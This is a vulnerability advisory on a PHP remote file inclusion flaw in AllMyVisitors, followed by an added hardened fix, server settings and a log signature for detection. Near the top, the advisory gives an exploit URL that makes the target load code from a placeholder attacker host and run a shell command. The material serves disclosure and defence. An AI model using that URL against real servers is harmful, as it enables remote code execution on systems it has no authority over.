******** AllMyVisitors PHP Code Injection vulnerability ********

Product           : AllMyVisitors
Vendor            : www.php-resource.net
Date              : February 14, 2004
Problem           : PHP Code Injection
Vendor Contacted ?: No

************************** Source ****************************

in /include/info.inc.php

--------------------------------------------------------------
$AMV_info_get = require_once("$_AMVconfig[cfg_serverpath]"."/include/template.inc.php");
--------------------------------------------------------------

************************** Exploit ***************************

http://[target]/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a

in http://[attacker]/include/template.inc.php have :

------------------------
------------------------

************************** Impact ****************************

A malicious user can execute arbitrary commands on the server.

************************* Solution ***************************

in /include/info.inc.php replace

$AMV_info_get = require_once("$_AMVconfig[cfg_serverpath]"."/include/template.inc.php");

with

if (isset($_AMVconfig['cfg_serverpath'])) {
    die("Don't Hack it :)");
}
$AMV_info_get = require_once("$_AMVconfig[cfg_serverpath]"."/include/template.inc.php");

************************** Credits ***************************

bnfx       : bnfx@antisocial.com
Mad_Skater : m4dsk4t3r@hotmail.com

TechTeam Brazilian Crew .
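The root cause is that `$_AMVconfig[cfg_serverpath]` can be populated from the query string (PHP's register_globals), so a remote URL ends up as the prefix of a `require_once`. The advisory's patch only checks whether the variable is set, which breaks if the application's own config file legitimately sets it before this line. The hardened variant below is an added example, not code from the advisory or from AllMyVisitors: it fixes the server path to a code-defined constant, refuses URL and stream-wrapper prefixes, and confines the resolved include to a base directory. The base directory (`dirname(__DIR__)`, i.e. the parent of `/include`) and the helper name `amv_safe_include_path` are assumptions; `$_AMVconfig`, `$AMV_info_get` and `cfg_serverpath` are the names from the advisory.

```php
<?php
// Added example (not AllMyVisitors' own code): hardened replacement for the
// request-influenced require_once in /include/info.inc.php.
//
// Assumptions not taken from the advisory: the application root is the
// directory above /include, and the only template loaded here is
// include/template.inc.php relative to that root.

declare(strict_types=1);

/**
 * Resolve $relative against $baseDir and return the absolute path, or null
 * when the result is not an existing regular file inside $baseDir.
 */
function amv_safe_include_path(string $baseDir, string $relative): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }

    // Reject anything with a scheme prefix (http://, ftp://, php://, data:):
    // an include path must never be a URL or a stream wrapper.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)) {
        return null;
    }

    // realpath() collapses ../ and symlinks, so the containment check below
    // is made against the real location on disk.
    $resolved = realpath($base . DIRECTORY_SEPARATOR . ltrim($relative, '/\\'));
    if ($resolved === false || !is_file($resolved)) {
        return null;
    }

    // Containment: the resolved file must sit under the base directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $resolved;
}

// The server path is fixed in code. Nothing from $_GET, $_POST or
// register_globals can change a constant once it is defined.
define('AMV_SERVER_PATH', dirname(__DIR__));

// Overwrite whatever $_AMVconfig may already hold (from the request or the
// config file) with the trusted value, so later code sees only this one.
$_AMVconfig['cfg_serverpath'] = AMV_SERVER_PATH;

$templatePath = amv_safe_include_path(AMV_SERVER_PATH, 'include/template.inc.php');
if ($templatePath === null) {
    http_response_code(500);
    exit('template not found');
}

$AMV_info_get = require_once $templatePath;
```

Two server-side settings reduce the blast radius of any remaining include built from variables: `register_globals = Off` stops request parameters from becoming PHP variables such as `$_AMVconfig`, and `allow_url_fopen = Off` (and, on PHP 5.2 and later, `allow_url_include = Off`) prevents `require`/`include` from fetching code over HTTP at all. Requests whose query string carries `_AMVconfig[` or a `cfg_serverpath=http` value are also an easy web-server log signature for attempts against this issue.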